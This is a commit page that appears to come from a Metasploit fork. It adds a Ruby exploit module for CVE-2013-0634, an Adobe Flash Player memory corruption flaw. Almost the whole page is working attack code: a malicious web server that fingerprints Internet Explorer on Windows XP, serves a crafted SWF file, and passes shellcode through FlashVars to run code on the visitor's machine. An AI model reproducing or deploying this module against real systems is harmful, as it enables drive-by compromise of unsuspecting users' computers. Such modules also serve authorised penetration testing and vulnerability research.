Add CVE-2013-0634: Adobe Flash Player 11.5 memory corruption

bug/bundler_fix
dukeBarman 2014-01-18 11:07:11 -05:00
parent b43a221959
commit 766c408d86
2 changed files with 157 additions and 0 deletions

Binary file not shown.

View File

@ -0,0 +1,157 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={})
super(update_info(info,
'Name' => "Adobe Flash Player 11.5 Remote Memory Corruption",
'Description' => %q{
This module exploits a vulnerability found in the ActiveX component of Adobe
Flash Player before 11.5.502.149. By supplying a specially crafted swf file
with special regex value, it is possible to trigger an
memory corruption, which results in remote code execution under the context of the
user. This vulnerability has also been exploited in the wild in February 2013.
Please note in order to ensure reliability, the exploit is forced to modify
your URIPATH parameter to less than 3 characters, which may cause possible
URIPATH collisions.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # malware sample
'Boris "dukeBarman" Ryutin' # msf exploit
],
'References' =>
[
[ 'CVE', '2013-0634' ],
[ 'OSVDB', '89936'],
[ 'BID', '57787'],
[ 'URL', 'http://malwaremustdie.blogspot.ru/2013/02/cve-2013-0634-this-ladyboyle-is-not.html' ],
[ 'URL', 'http://malware.dontneedcoffee.com/2013/03/cve-2013-0634-adobe-flash-player.html' ],
[ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html' ],
[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/adobe-patches-two-vulnerabilities-being-exploited-in-the-wild/' ],
[ 'URL', 'http://eromang.zataz.com/tag/cve-2013-0634/' ]
],
'Payload' =>
{
'Space' => 1024
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'EXITFUNC' => 'thread',
'HTTP::compression' => 'gzip',
'HTTP::chunked' => true,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 6 on Windows XP SP3', {'Rop' => nil } ],
[ 'IE 7 on Windows XP SP3', {'Rop' => nil } ],
[ 'IE 8 on Windows XP SP3', {'Rop' => nil } ]
],
'Privileged' => false,
'DisclosureDate' => "Feb 8 2013",
'DefaultTarget' => 0))
end
def get_payload(t)
p = payload.encoded
return p
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
return targets[1] #IE 6 on Windows XP SP3
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows XP SP3
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
return targets[3] #IE 8 on Windows XP SP3
else
return nil
end
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
my_target = get_target(agent)
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("Browser not supported: #{agent}")
send_not_found(cli)
return
end
print_status("Target selected: #{my_target.name}")
print_status("Client requesting: #{request.uri}")
swf_uri = "/#{@resource_name}.swf"
shellcode = get_payload(my_target).unpack("H*")[0]
# The SWF request itself
if request.uri =~ /\.swf$/
print_status("Sending SWF")
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash'})
return
end
html = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="#{swf_uri}" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="his=#{shellcode}" />
<param name="Play" value="true" />
</object>
</body>
</html>
|
html = html.gsub(/^ {4}/, '')
print_status("Sending HTML")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
def primer
hardcoded_uripath("/#{@resource_name}.swf")
end
def exploit
@swf = create_swf
@resource_name = Rex::Text.rand_text_alpha(5)
vprint_status("SWF Loaded: #{@swf.length.to_s} bytes")
datastore['URIPATH'] = datastore['URIPATH'] || random_uri
datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\//
datastore['URIPATH'] = datastore['URIPATH'][0,3] if datastore['URIPATH'].length > 3
print_warning("URIPATH set to #{datastore['URIPATH']}")
super
end
def create_swf
path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-0634", "Main.swf" )
fd = ::File.open( path, "rb" )
swf = fd.read(fd.stat.size)
fd.close
return swf
end
end